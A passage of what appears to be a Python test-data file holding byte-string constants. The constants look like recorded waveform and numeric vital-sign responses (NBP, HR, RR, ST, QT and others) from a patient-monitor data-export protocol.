b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\xa0\x84\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ 
b"\x1f\xff\x1f\xff\x20\x00\x20\x02\x20\x04\x20\x08\x20\x08\x20\x0b" \ b"\x20\x10\x20\x12\x20\x15\x20\x17\x20\x1a\x20\x1c\x20\x1f\x20\x22" \ b"\x20\x25\x20\x27\x20\x2a\x20\x2d\x20\x30\x20\x33\x20\x33\x20\x32" \ b"\x20\x30\x20\x2f\x20\x2a\x20\x28\x20\x24\x20\x22\x20\x1f\x20\x1d" \ b"\x20\x19\x20\x17\x20\x14\x20\x12\x20\x0e\x20\x0c\x20\x0a\x20\x06" \ b"\x20\x03\x20\x01\x1f\xff\x1f\xfe\x1f\xfe\x1f\xfd\x1f\xfd\x1f\xfc" \ b"\x1f\xfc\x1f\xfb\x1f\xfb\x1f\xfb\x1f\xfb\x1f\xfb\x1f\xfb\x1f\xfb" \ b"\x1f\xfb\x1f\xfd\x1f\xfc\x1f\xfc\x1f\xfc\x1f\xfc\x1f\xfc\x1f\xfc" \ b"\x1f\xfc\x08\x11\x00\x01\x01\x0a\x09\x6e\x01\x06\x01\x3d\x04\x00" \ b"\x01\x00\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\xa1\x04\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xff\x20\x03\x20\x09\x20\x0f\x20\x13\x20\x1d\x20\x23" \ b"\x20\x27\x20\x2f\x20\x35\x20\x3d\x20\x43\x20\x4b\x20\x51\x20\x57" \ b"\x20\x5d\x20\x65\x20\x6b\x20\x71\x20\x77\x20\x79\x20\x77\x20\x73" \ b"\x20\x6d\x20\x65\x20\x61\x20\x59\x20\x53\x20\x4b\x20\x43\x20\x3b" \ b"\x20\x35\x20\x2d\x20\x25\x20\x1d\x20\x17\x20\x0f\x20\x07\x20\x01" \ b"\x1f\xfb\x1f\xf5\x1f\xf3\x1f\xf1\x1f\xef\x1f\xef\x1f\xef\x1f\xef" \ b"\x1f\xef\x1f\xf1\x1f\xf1\x1f\xf1\x1f\xf1\x1f\xf1\x1f\xf1\x1f\xf1" \ b"\x1f\xf1\x1f\xef\x1f\xf1\x1f\xf1\x1f\xf1\x1f\xf1\x1f\xf1\x1f\xf1" \ b"\x1f\xf1\x07\x8e\x00\x01\x00\x4a\x09\x6e\x00\x46\x4b\xb4\x04\x00" \ b"\x00\x40\x0b\x7b\x0b\x9f\x0b\xbd\x0b\xd5\x0b\xe8\x0b\xf6\x0b\xfe" \ b"\x0c\x00\x0b\xfc\x0b\xf3\x0b\xe5\x0b\xd2\x0b\xba\x0b\x9d\x0b\x7b" \ 
b"\x0b\x56\x0b\x2c\x0b\x00\x0a\xd0\x0a\x9d\x0a\x68\x0a\x31\x09\xf9" \ b"\x09\xbf\x09\x85\x09\x4b\x09\x10\x08\xd7\x08\x9e\x08\x66\x08\x30" \ b"\x07\xfb" rsp_wave_9_no_4 = \ b"\xe1\x00\x00\x02\x00\x02" \ b"\x03\xb0\x00\x04\x00\x07\x03\xaa\x00\x21\x00\x00\x00\x00\xf1\x3b" \ b"\x03\xa0\x00\x03\x00\x03\x0e\x80\x98\x00\xff\xff\xff\xff\xff\xff" \ b"\xff\xff\x00\x01\x00\x09\x00\x00\x00\x01\x03\x86\x00\x00\x00\x04" \ b"\x03\x80\x08\x11\x00\x01\x01\x0a\x09\x6e\x01\x06\x01\x02\x04\x00" \ b"\x01\x00\x1f\xee\x1f\xef\x1f\xef\x1f\xef\x1f\xef\x1f\xef\x1f\xef" \ b"\x1f\xef\x1f\xef\x1f\xf0\x1f\xf0\x1f\xf0\x1f\xf0\x1f\xf0\x1f\xf0" \ b"\x1f\xf0\x1f\xf0\x1f\xf0\x1f\xf0\x1f\xf0\x1f\xf1\x1f\xf1\x1f\xf1" \ b"\x1f\xf1\x1f\xf1\x1f\xf1\x1f\xf1\x1f\xf1\x1f\xf1\x1f\xf1\x1f\xf1" \ b"\x1f\xf1\x1f\xf1\x1f\xf1\x1f\xf1\x1f\xf1\x1f\xf2\x1f\xf2\x1f\xf2" \ b"\x1f\xf2\x1f\xf2\x1f\xf2\x1f\xf2\x1f\xf2\x1f\xf2\x1f\xf2\x1f\xf2" \ b"\x1f\xf2\x1f\xf2\x1f\xf2\x1f\xf2\x1f\xf2\x1f\xf3\x1f\xf3\x1f\xf3" \ b"\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3" \ b"\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf4\x1f\xf4\x1f\xf4" \ b"\x1f\xf4\x1f\xf4\x1f\xf4\x1f\xf4\x1f\xf4\x1f\xf4\x1f\xf4\x1f\xf4" \ b"\x1f\xf4\x1f\xf4\x1f\xf4\x1f\xf4\x1f\xf4\x1f\xf5\x1f\xf5\x1f\xf5" \ b"\x1f\xf4\x1f\xf3\x1f\xf3\x1f\xf2\x1f\xf1\x1f\xf0\x1f\xf0\x1f\xef" \ b"\x1f\xed\x1f\xed\x1f\xec\x1f\xeb\x1f\xea\x1f\xe9\x1f\xe8\x1f\xe7" \ b"\x1f\xe6\x1f\xe5\x1f\xe4\x1f\xe3\x1f\xe2\x1f\xe1\x1f\xe0\x1f\xdf" \ b"\x1f\xde\x1f\xdd\x1f\xdc\x1f\xdb\x1f\xda\x1f\xd9\x1f\xd8\x1f\xd8" \ b"\x1f\xd7\x1f\xd6\x1f\xd5\x1f\xd4\x1f\xd3\x1f\xd2\x1f\xd1\x1f\xd0" \ b"\x1f\xd0\x08\x11\x00\x01\x01\x0a\x09\x6e\x01\x06\x01\x01\x04\x00" \ b"\x01\x00\x1f\xfc\x1f\xfb\x1f\xfb\x1f\xfb\x1f\xfb\x1f\xfb\x1f\xfb" \ b"\x1f\xfb\x1f\xfb\x1f\xfc\x1f\xfc\x1f\xfc\x1f\xfc\x1f\xfc\x1f\xfc" \ b"\x1f\xfc\x1f\xfc\x1f\xfc\x1f\xfc\x1f\xfc\x1f\xfb\x1f\xfb\x1f\xfb" \ b"\x1f\xfb\x1f\xfb\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ 
b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfc\x1f\xfc\x1f\xfc" \ b"\x1f\xfc\x1f\xfc\x1f\xfe\x1f\xfe\x1f\xfe\x1f\xfe\x1f\xfe\x1f\xfe" \ b"\x1f\xfe\x1f\xfe\x1f\xfe\x1f\xfe\x1f\xfe\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xfe\x1f\xfe\x1f\xfe" \ b"\x1f\xfe\x1f\xfe\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00" \ b"\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00\x1f\xff\x1f\xff\x1f\xff" \ b"\x20\x00\x1f\xff\x1f\xff\x1f\xfe\x1f\xfd\x1f\xfc\x1f\xfc\x1f\xfb" \ b"\x1f\xfb\x1f\xfb\x1f\xfa\x1f\xf9\x1f\xfa\x1f\xf9\x1f\xfa\x1f\xf9" \ b"\x1f\xf8\x1f\xf7\x1f\xf8\x1f\xf7\x1f\xf8\x1f\xf7\x1f\xf8\x1f\xf7" \ b"\x1f\xf6\x1f\xf7\x1f\xf6\x1f\xf7\x1f\xf6\x1f\xf5\x1f\xf6\x1f\xf4" \ b"\x1f\xf5\x1f\xf4\x1f\xf5\x1f\xf4\x1f\xf5\x1f\xf4\x1f\xf5\x1f\xf6" \ b"\x1f\xf6\x08\x11\x00\x01\x01\x0a\x09\x6e\x01\x06\x01\x3d\x04\x00" \ b"\x01\x00\x1f\xf1\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3" \ b"\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3" \ b"\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf5\x1f\xf5\x1f\xf5" \ b"\x1f\xf5\x1f\xf5\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3" \ b"\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf5\x1f\xf5\x1f\xf5" \ b"\x1f\xf5\x1f\xf5\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3" \ b"\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf5\x1f\xf5\x1f\xf5" \ b"\x1f\xf5\x1f\xf5\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3" \ b"\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf5\x1f\xf5\x1f\xf5" \ b"\x1f\xf5\x1f\xf5\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3" \ b"\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf5\x1f\xf5\x1f\xf5" \ b"\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3" \ b"\x1f\xf1\x1f\xf1\x1f\xf1\x1f\xf1\x1f\xef\x1f\xef\x1f\xed\x1f\xed" \ b"\x1f\xed\x1f\xed\x1f\xeb\x1f\xeb\x1f\xe9\x1f\xe9\x1f\xe7\x1f\xe7" \ b"\x1f\xe7\x1f\xe5\x1f\xe5\x1f\xe3\x1f\xe3\x1f\xe3\x1f\xe1\x1f\xe3" \ 
b"\x1f\xe1\x1f\xe1\x1f\xdf\x1f\xdf\x1f\xdd\x1f\xdd\x1f\xdb\x1f\xd9" \ b"\x1f\xd9\x07\x8e\x00\x01\x00\x4a\x09\x6e\x00\x46\x4b\xb4\x04\x00" \ b"\x00\x40\x07\xc9\x07\x99\x07\x6b\x07\x40\x07\x18\x06\xf3\x06\xd2" \ b"\x06\xb3\x06\x97\x06\x7f\x06\x69\x06\x57\x06\x47\x06\x3a\x06\x2f" \ b"\x06\x27\x06\x21\x06\x1d\x06\x1a\x06\x19\x06\x19\x06\x1a\x06\x1b" \ b"\x06\x1d\x06\x1e\x06\x20\x06\x20\x06\x20\x06\x1f\x06\x1d\x06\x1a" \ b"\x06\x15" rsp_nu_10_no_1 = \ b"\xe1\x00\x00\x02\x00\x03" \ b"\x00\x06\x00\x01\x00\x02\x00\x00\x88\x88\x88\x88" rsp_nu_10_no_2 = \ b"\xe1\x00\x00\x02\x00\x05" \ b"\x04\x1c\x01\x01\x00\x01\x00\x07\x04\x14\x00\x21\x00\x00\x00\x00" \ b"\xf1\x3b\x04\x0a\x00\x01\x00\x00\x0e\x80\xcf\x00\xff\xff\xff\xff" \ b"\xff\xff\xff\xff\x00\x01\x00\x06\x00\x00\x00\x01\x03\xf0\x00\x00" \ b"\x00\x0a\x03\xea\x86\x3f\x00\x07\x00\x46\x09\x21\x00\x02\x86\x3f" \ b"\x09\x2f\x00\x04\x00\x01\x00\x06\x09\x3f\x00\x0c\x00\x00\x20\x00" \ b"\x00\x01\x42\x28\x00\x00\x00\x00\x09\x24\x00\x04\x00\x02\x58\x04" \ b"\x09\x27\x00\x10\x00\x0e\x00\x43\x00\x50\x00\x50\x00\x20\x00\x20" \ b"\x00\x20\x00\x00\x09\x17\x00\x02\x03\x00\x09\x11\x00\x02\x00\x05" \ b"\x86\x58\x00\x07\x00\x46\x09\x21\x00\x02\x86\x58\x09\x2f\x00\x04" \ b"\x00\x01\x00\x06\x09\x3f\x00\x0c\x00\x00\x20\x00\x00\x01\x42\x28" \ b"\x00\x00\x00\x00\x09\x24\x00\x04\x00\x02\xe0\x18\x09\x27\x00\x10" \ b"\x00\x0e\x03\x94\x6e\x29\xfe\xff\x5e\xa6\xfe\xff\x00\x20\x00\x00" \ b"\x09\x17\x00\x02\x03\x01\x09\x11\x00\x02\x00\x02\x87\x8c\x00\x09" \ b"\x00\x5a\x09\x21\x00\x02\x87\x8c\x09\x2f\x00\x04\x00\x01\x00\x06" \ b"\x09\x3f\x00\x0c\x00\x00\x20\x00\x00\x01\x42\x28\x00\x00\x00\x00" \ b"\x09\x24\x00\x04\x00\x02\x4b\xb8\x09\x27\x00\x10\x00\x0e\x00\x53" \ b"\x00\x70\x00\x4f\x20\x82\x00\x20\x00\x20\x00\x00\x09\x17\x00\x02" \ b"\x03\x00\x09\x11\x00\x02\x00\x06\xf0\x08\x00\x02\x06\xd1\x09\x50" \ b"\x00\x0a\x4b\xb8\x04\x00\x02\x20\xff\x00\x03\xb6\x87\x92\x00\x07" \ b"\x00\x4e\x09\x21\x00\x02\x87\x92\x09\x2f\x00\x04\x00\x01\x00\x06" \ 
b"\x09\x3f\x00\x0c\x00\x00\x20\x00\x00\x01\x42\x28\x00\x00\x00\x00" \ b"\x09\x24\x00\x04\x00\x02\x48\x22\x09\x27\x00\x10\x00\x0e\x81\x09" \ b"\xfe\xff\x64\x0f\xfe\xff\x00\x20\x00\x20\x00\x00\x09\x11\x00\x02" \ b"\x00\x06\x09\x50\x00\x0a\x48\x22\x04\x01\x0a\xa0\x00\x00\x00\x3c" \ b"\x87\x96\x00\x08\x00\x54\x09\x21\x00\x02\x87\x96\x09\x2f\x00\x04" \ b"\x00\x01\x00\x06\x09\x3f\x00\x0c\x00\x00\x20\x00\x00\x01\x42\x28" \ b"\x00\x00\x00\x00\x09\x24\x00\x04\x00\x02\x4b\xb0\x09\x27\x00\x10" \ b"\x00\x0e\x70\x4c\xfe\xff\x6c\xe8\xfe\xff\x00\x20\x00\x20\x00\x00" \ b"\x09\x17\x00\x02\x02\x01\x09\x11\x00\x02\x00\x06\x09\x50\x00\x0a" \ b"\x4b\xb0\x04\x00\x02\x00\xff\x00\x00\x64\x87\xe6\x00\x0a\x00\x82" \ b"\x09\x21\x00\x02\x87\xe6\x09\x2f\x00\x04\x00\x01\x00\x06\x09\x3f" \ b"\x00\x0c\x00\x00\x20\x00\x00\x01\x52\x28\x01\x03\x00\x00\x09\x24" \ b"\x00\x04\x00\x02\x4a\x04\x09\x27\x00\x10\x00\x0e\x00\x4e\x00\x42" \ b"\x00\x50\x00\x20\x00\x20\x00\x20\x00\x00\x09\x11\x00\x02\x00\x01" \ b"\x09\x90\x00\x08\x20\x19\x03\x21\x16\x30\x43\x00\xf2\x37\x00\x04" \ b"\xff\xff\xff\xff\xf9\x98\x00\x04\xff\xff\xff\xff\x09\x4b\x00\x22" \ b"\x00\x03\x00\x1e\x4a\x05\x20\x00\x0f\x20\x00\x7f\xff\xff\x4a\x06" \ b"\x20\x00\x0f\x20\x00\x7f\xff\xff\x4a\x07\x20\x00\x0f\x20\x00\x7f" \ b"\xff\xff\x87\xe9\x00\x0a\x00\x68\x09\x21\x00\x02\x87\xe9\x09\x2f" \ b"\x00\x04\x00\x01\x00\x06\x09\x3f\x00\x0c\x00\x00\x20\x00\x00\x01" \ b"\x52\x28\x00\x01\x00\x00\x09\x24\x00\x04\x00\x02\xf0\xe5\x09\x27" \ b"\x00\x10\x00\x0e\x81\x09\xfe\xff\x64\x0f\xfe\xff\x00\x20\x00\x20" \ b"\x00\x00\x09\x17\x00\x02\x03\x00\x09\x11\x00\x02\x00\x01\x09\x90" \ b"\x00\x08\x20\x19\x03\x21\x16\x30\x43\x00\xf9\x98\x00\x04\xff\xff" \ b"\xff\xff\x09\x50\x00\x0a\xf0\xe5\x20\x00\x0a\xa0\x00\x7f\xff\xff" \ b"\x88\x16\x00\x07\x00\x4e\x09\x21\x00\x02\x88\x16\x09\x2f\x00\x04" \ b"\x00\x01\x00\x06\x09\x3f\x00\x0c\x00\x00\x20\x00\x00\x01\x42\x28" \ b"\x00\x00\x00\x00\x09\x24\x00\x04\x00\x02\x41\x82\x09\x27\x00\x10" \ 
b"\x00\x0e\x00\x48\x00\x52\x00\x20\x00\x20\x00\x20\x00\x20\x00\x00" \ b"\x09\x11\x00\x02\x00\x02\x09\x50\x00\x0a\x41\x82\x04\x00\x0a\xa0" \ b"\x00\x00\x00\x3c\x88\x1d\x00\x07\x00\x4e\x09\x21\x00\x02\x88\x1d" \ b"\x09\x2f\x00\x04\x00\x01\x00\x06\x09\x3f\x00\x0c\x00\x00\x20\x00" \ b"\x00\x01\x42\x28\x00\x00\x00\x00\x09\x24\x00\x04\x00\x02\x50\x0a" \ b"\x09\x27\x00\x10\x00\x0e\x00\x52\x00\x52\x00\x20\x00\x20\x00\x20" \ b"\x00\x20\x00\x00\x09\x11\x00\x02\x00\x03\x09\x50\x00\x0a\x50\x0a" \ b"\x04\x00\x0a\xe0\x00\x00\x00\x0f\x88\x22\x00\x08\x00\xa0\x09\x21" \ b"\x00\x02\x88\x22\x09\x2f\x00\x04\x00\x01\x00\x06\x09\x3f\x00\x0c" \ b"\x00\x00\x20\x00\x00\x01\x42\x28\x01\x0c\x00\x00\x09\x24\x00\x04" \ b"\x00\x02\x03\x00\x09\x27\x00\x10\x00\x0e\x00\x53\x00\x54\x00\x20" \ b"\x00\x20\x00\x20\x00\x20\x00\x00\x09\x11\x00\x02\x00\x02\x09\x4b" \ b"\x00\x54\x00\x08\x00\x50\x03\x01\x84\x00\x05\x12\x00\x7f\xff\xff" \ b"\x03\x02\x84\x00\x05\x12\x00\x7f\xff\xff\x03\x3d\x84\x00\x05\x12" \ b"\x00\x7f\xff\xff\x03\x3e\x84\x00\x05\x12\x00\x7f\xff\xff\x03\x3f" \ b"\x84\x00\x05\x12\x00\x7f\xff\xff\x03\x40\x84\x00\x05\x12\x00\x7f" \ b"\xff\xff\x03\x04\x84\x00\x05\x12\x00\x7f\xff\xff\x03\x07\x84\x00" \ b"\x05\x12\x00\x7f\xff\xff\x09\x91\x00\x04\x0e\x7e\xf0\x00" rsp_nu_10_no_3 = \ b"\xe1\x00\x00\x02\x00\x05" \ b"\x02\x50\x03\x02\x00\x01\x00\x07\x02\x48\x00\x21\x00\x00\x00\x00" \ b"\xf1\x3b\x02\x3e\x00\x01\x00\x00\x0e\x80\xcf\x00\xff\xff\xff\xff" \ b"\xff\xff\xff\xff\x00\x01\x00\x06\x00\x00\x00\x01\x02\x24\x00\x00" \ b"\x00\x09\x02\x1e\x88\x28\x00\x03\x00\x1e\x09\x21\x00\x02\x88\x28" \ b"\x09\x2f\x00\x04\x00\x01\x00\x06\x09\x3f\x00\x0c\x00\x00\x20\x00" \ b"\x00\x01\x24\x00\x01\x0c\x00\x80\x88\x2a\x00\x06\x00\x40\x09\x21" \ b"\x00\x02\x88\x2a\x09\x2f\x00\x04\x00\x01\x00\x06\x09\x3f\x00\x0c" \ b"\x00\x00\x20\x00\x00\x05\x42\x28\x00\x00\x00\x00\x09\x24\x00\x04" \ b"\x00\x02\xf0\x3d\x09\x27\x00\x10\x00\x0e\x00\x53\x00\x54\x63\x07" \ b"\xfe\xff\x65\x70\xfe\xff\x00\x00\x09\x11\x00\x02\x00\x02\x88\x2f" \ 
b"\x00\x07\x00\x4e\x09\x21\x00\x02\x88\x2f\x09\x2f\x00\x04\x00\x01" \ b"\x00\x06\x09\x3f\x00\x0c\x00\x00\x20\x00\x00\x01\x42\x28\x00\x00" \ b"\x00\x00\x09\x24\x00\x04\x00\x02\x42\x61\x09\x27\x00\x10\x00\x0e" \ b"\x00\x50\x00\x56\x00\x43\x00\x20\x00\x20\x00\x20\x00\x00\x09\x11" \ b"\x00\x02\x00\x02\x09\x50\x00\x0a\x42\x61\x04\x00\x0a\xa0\x00\x00" \ b"\x00\x00\x88\x3c\x00\x06\x00\x40\x09\x21\x00\x02\x88\x3c\x09\x2f" \ b"\x00\x04\x00\x01\x00\x06\x09\x3f\x00\x0c\x00\x00\x20\x00\x00\x01" \ b"\x42\x28\x00\x00\x00\x00\x09\x24\x00\x04\x00\x02\x3f\x20\x09\x27" \ b"\x00\x10\x00\x0e\x00\x51\x00\x54\x00\x20\x00\x20\x00\x20\x00\x20" \ b"\x00\x00\x09\x11\x00\x02\x00\x02\x88\x3e\x00\x06\x00\x40\x09\x21" \ b"\x00\x02\x88\x3e\x09\x2f\x00\x04\x00\x01\x00\x06\x09\x3f\x00\x0c" \ b"\x00\x00\x20\x00\x00\x01\x42\x28\x00\x00\x00\x00\x09\x24\x00\x04" \ b"\x00\x02\x3f\x24\x09\x27\x00\x10\x00\x0e\x00\x51\x00\x54\x00\x63" \ b"\x00\x20\x00\x20\x00\x20\x00\x00\x09\x11\x00\x02\x00\x02\x88\x40" \ b"\x00\x06\x00\x40\x09\x21\x00\x02\x88\x40\x09\x2f\x00\x04\x00\x01" \ b"\x00\x06\x09\x3f\x00\x0c\x00\x00\x20\x00\x00\x01\x42\x28\x00\x00" \ b"\x00\x00\x09\x24\x00\x04\x00\x02\xf1\x56\x09\x27\x00\x10\x00\x0e" \ b"\x03\x94\x00\x51\x00\x54\x00\x63\x00\x20\x00\x20\x00\x00\x09\x11" \ b"\x00\x02\x00\x02\x88\x42\x00\x06\x00\x40\x09\x21\x00\x02\x88\x42" \ b"\x09\x2f\x00\x04\x00\x01\x00\x06\x09\x3f\x00\x0c\x00\x00\x20\x00" \ b"\x00\x01\x42\x28\x00\x00\x00\x00\x09\x24\x00\x04\x00\x02\xf1\x54" \ b"\x09\x27\x00\x10\x00\x0e\x00\x51\x00\x54\x00\x2d\x00\x48\x00\x52" \ b"\x00\x20\x00\x00\x09\x11\x00\x02\x00\x02\x88\x46\x00\x03\x00\x1e" \ b"\x09\x21\x00\x02\x88\x46\x09\x2f\x00\x04\x00\x01\x00\x06\x09\x3f" \ b"\x00\x0c\x00\x00\x20\x00\x00\x01\x24\x00\x00\x00\x00\x80\x88\x48" \ b"\x00\x03\x00\x1e\x09\x21\x00\x02\x88\x48\x09\x2f\x00\x04\x00\x01" \ b"\x00\x06\x09\x3f\x00\x0c\x00\x00\x20\x00\x00\x01\x24\x00\x00\x00" \ b"\x00\x80" rsp_nu_10_no_4 = \ b"\xe1\x00\x00\x02\x00\x02" \ 
b"\x00\x2a\x00\x01\x00\x07\x00\x24\x00\x21\x00\x00\x00\x00\xf1\x3b" \ b"\x00\x1a\x00\x01\x00\x00\x0e\x80\xcf\x00\xff\xff\xff\xff\xff\xff" \ b"\xff\xff\x00\x01\x00\x06\x00\x00\x00\x00\x00\x00" rsp_wave_10_no_1 = \ b"\xe1\x00\x00\x02\x00\x02" \ b"\x04\x46\x00\x04\x00\x07\x04\x40\x00\x21\x00\x00\x00\x00\xf1\x3b" \ b"\x04\x36\x00\x03\x00\x00\x0e\x80\xa0\x00\xff\xff\xff\xff\xff\xff" \ b"\xff\xff\x00\x01\x00\x09\x00\x00\x00\x01\x04\x1c\x00\x00\x00\x04" \ b"\x04\x16\x08\x11\x00\x01\x01\x0a\x09\x6e\x01\x06\x01\x02\x04\x00" \ b"\x01\x00\x1f\xd0\x1f\xd1\x1f\xd3\x1f\xd4\x1f\xd5\x1f\xd7\x1f\xd8" \ b"\x1f\xd9\x1f\xdb\x1f\xdc\x1f\xde\x1f\xdf\x1f\xe0\x1f\xe1\x1f\xe3" \ b"\x1f\xe4\x1f\xe5\x1f\xe7\x1f\xe8\x1f\xe9\x1f\xeb\x1f\xec\x1f\xed" \ b"\x1f\xee\x1f\xf0\x1f\xf1\x1f\xf2\x1f\xf3\x1f\xf4\x1f\xf5\x1f\xf7" \ b"\x1f\xf8\x1f\xfa\x1f\xfb\x1f\xfc\x1f\xfc\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x08\x11\x00\x01\x01\x0a\x09\x6e\x01\x06\x01\x01\x04\x00" \ b"\x01\x00\x1f\xf6\x1f\xf7\x1f\xf5\x1f\xf6\x1f\xf7\x1f\xf7\x1f\xf8" \ b"\x1f\xf9\x1f\xf7\x1f\xf8\x1f\xf8\x1f\xf9\x1f\xfa\x1f\xfb\x1f\xf9" \ b"\x1f\xfa\x1f\xfb\x1f\xfb\x1f\xfc\x1f\xfb\x1f\xfb\x1f\xfc\x1f\xfd" \ b"\x1f\xfe\x1f\xfe\x1f\xfd\x1f\xfe\x1f\xff\x20\x00\x1f\xff\x1f\xff" \ 
b"\x20\x00\x20\x00\x1f\xff\x1f\xfe\x20\x00\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x08\x11\x00\x01\x01\x0a\x09\x6e\x01\x06\x01\x3d\x04\x00" \ b"\x01\x00\x1f\xd9\x1f\xd9\x1f\xdd\x1f\xdd\x1f\xdd\x1f\xdf\x1f\xdf" \ b"\x1f\xdf\x1f\xe3\x1f\xe3\x1f\xe5\x1f\xe5\x1f\xe5\x1f\xe5\x1f\xe9" \ b"\x1f\xe9\x1f\xe9\x1f\xeb\x1f\xeb\x1f\xed\x1f\xef\x1f\xef\x1f\xef" \ b"\x1f\xef\x1f\xf1\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf5\x1f\xf7" \ b"\x1f\xf7\x1f\xf9\x1f\xfb\x1f\xfd\x1f\xfb\x1f\xfd\x1f\xfd\x1f\xfd" \ 